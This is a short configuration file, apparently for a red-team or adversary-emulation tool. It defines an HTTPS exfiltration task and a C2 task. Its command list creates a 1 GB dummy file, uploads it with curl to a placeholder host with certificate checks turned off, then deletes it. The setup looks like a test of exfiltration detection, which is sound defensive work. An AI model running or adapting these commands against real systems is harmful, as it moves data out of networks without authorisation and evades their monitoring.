[exfil_task]
exfil_type = http
exfil_port = 443
tls = True
test_certificate = False
domain_name = None
cert_subj = /C=US/ST=Utah/L=Lehi/O=Your Company, Inc./OU=IT/CN=$HOST

[c2_task]
task_name = c2_http_mm_dd_YYYY_HH_MM
agent_name = 1w2x3y4z

[exfil_actions]
exfil_file = exfil_file.bin
exfil_path = c:\\
exfil_size = 1073741824
command_list = fsutil file createnew $EXFIL_PATH$EXFIL_FILE $EXFIL_SIZE; dir $EXFIL_PATH, c:\Windows\System32\curl.exe -k -F file=@$EXFIL_PATH$EXFIL_FILE $EXFIL_TYPE$TLS://$EXFIL_HOST:$EXFIL_PORT/p, del $EXFIL_PATH$EXFIL_FILE
